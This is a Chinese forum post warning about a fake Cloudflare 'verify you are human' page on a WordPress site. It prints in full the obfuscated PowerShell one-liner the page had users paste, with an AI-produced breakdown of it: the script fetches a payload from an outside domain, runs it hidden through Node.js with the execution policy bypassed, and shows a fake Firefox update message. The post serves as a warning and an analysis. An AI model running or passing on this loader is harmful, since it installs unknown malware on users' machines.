警惕！偶遇假CloudFlare验证页面，差点中毒

今天打开某个wordpress网站时，首先跳出CloudFlare的验证页面，然而吊诡的是，往日里应该鼠标单击一下就验证通过的页面却变成下图所示。

$nzr69=‘eeDRdInhH’;$tfpr16=‘4107203e50780b182f1452736f43123d113b1100297c2a2c1a461b0017323b072c3e07210b1109330a28090d3a385f7e01012a1b1a21111c14200b3d010b2709581f011d3a1a0d254b2b21264a1a0b0b3d170c302b343b011c27060a28061d390b35725f312821557b554c2f0807756a5903010126483525260c694a0d26135f101729194e4013361c372601244021074b3525260c1454520f001116330a2d01050e0c09211c05240b40614c5e0a371364271c2d0845691b102c033c31150064160d3b0b0b3c0a173d7249190f1c204541233f0678564865230a36310135211d3c482b313e08724a093c175179180b2000451804112c72402e030a795d456c0937301d1c2d084b0d1d4a190f1c20385f7e15013d3c0926010a29140d250b262908006c7b4f6e49462d1d0063754d724a1b305c5779625f2f011a60411d36231d79535873411d36231d794e4524114577724928000c68480b2b26446d1d1071575e602a16381758634e4c3f261630152126130a2f37491e0b0a1a00143137173d4e451d170c647543211a1c38165f6b7d07261d05271611252017671d0027154a25220d6607062c001d6a220c39510975010962260b220b06755d06253302705b5b2c5d5c70655c2b56097f545c7537067a5c5a715006756353285d59780750773307705e5d710151253652700f592d565c7337077a0c5a2c51433624592d080b2a075725615c79585f7e005273620671560b2d510776375c7d560b290043372007740a0c3e0b136a310b244805270100793108261b0c2e09043637436e4e45071011023b082c4e4c2911177072491c1d0d0a04162d3134281c1b210b027f3b02613a0d3b1148143310214e4c291117707b1f6d1d10715758752f01251d0d333611252010643d042d0015647f372c0d07260116646019340d093c060d3f0110281c1c65360921371469433b2d060a2a3617695c15355e0c227a4927011c684d31212110643e093c0d456033103b5a41611e003c3b1034553b3c0417307f343b010b2d1616647f2220020d1804112c7240281a1a7c4548133b0a2d011f1b111c28374401070c2c000b7f261630153a2d080a323749001a0d254548083b102c1c09243504303a446d0f1c3a514569140b3b0d0d68482036200b3b2f0b3c0c0a2a723720020d2611093d110b271a012610003931053d0d0033185e6369373d0f1a3c4835363d072c1d1b6848322d3c0026193b3c1c0921722c200a0c2d0b45343d132c1c1b200009287249081c0f3d08002a2628201d1c6842480a3d343b010e210900637e4364390126010a33011030020d6f49420c3b002d0b066f494269110b2403092601426876062d025c7900152323537e550d300c11’;$kc02=‘’;0..($tfpr16.Length/2-1)|%{ke0=_*2;$kc02+=char};&([ScriptBlock]::Create($kc02))

推荐阅读

[玄学] 看佛经的一些困惑

推荐阅读

[iPhone] iPhone 17 异常发热、电量尿崩，折腾两个月终于破案了……

楼主感到蹊跷，把代码丢进deepseek把乱码还原分析，deepseek解读如下：

    首先清屏，输出绿色“Starting firefox update...”

    定义一个字符串变量$Updater，包含一系列命令：

        从 https://autoupdatet.com/get_update?i=102255 下载文件保存为 Update.zip

        从 https://nodejs.org/dist/v7.10.1/node-v7.10.1-win-x64.zip 下载文件保存为 firefox.zip（注意：这个URL是Node.js v7.10.1，不是Firefox。名字具有欺骗性）

        解压firefox.zip到 C:\ProgramData\

        解压Update.zip到 C:\ProgramData\

        启动 C:\ProgramData\node-v7.10.1-win-x64\node.exe，参数为 C:\ProgramData\Update.js，窗口隐藏

    然后，通过Start-Process启动一个新的PowerShell进程，参数为：-NoProfile, -ExecutionPolicy Bypass, -WindowStyle Hidden, -Command 加上上面的Updater字符串。这意味着在一个隐藏的PowerShell窗口中执行Updater字符串。这意味着在一个隐藏的PowerShell窗口中执行Updater中的命令。

    最后，输出“Done! firefox security intelligence version ... successfully installed.”（这是虚假的成功消息，旨在误导用户认为Firefox更新已安装）

分析意图：这是一个恶意脚本。它伪装成Firefox更新，但实际上会下载并执行未知代码。下载的两个文件：Update.zip和firefox.zip（实际上nodejs）。解压后运行node.exe执行Update.js。攻击者可能利用Node.js运行恶意JavaScript代码。域名autoupdatet.com可疑，不是官方域名。参数i=102255可能用于标识目标或特定载荷。

执行后果：

    下载并解压文件到C:\ProgramData\（所有用户共享的程序数据目录）。

    在隐藏的PowerShell进程中执行下载和运行操作，用户可能看不到窗口。

    最终会运行一个Node.js脚本（Update.js），该脚本可能具有恶意行为，例如：窃取信息、安装后门、下载更多恶意软件、加密文件勒索、键盘记录等。

    由于使用了-EP Bypass，绕过了PowerShell执行策略限制。

    代码没有检查下载文件的完整性和安全性。

    该脚本试图欺骗用户，让用户以为Firefox安全智能更新已成功安装，但实际上与Firefox无关。

打开网站其他页面显示如下

2 个帖子 - 2 位参与者

阅读完整话题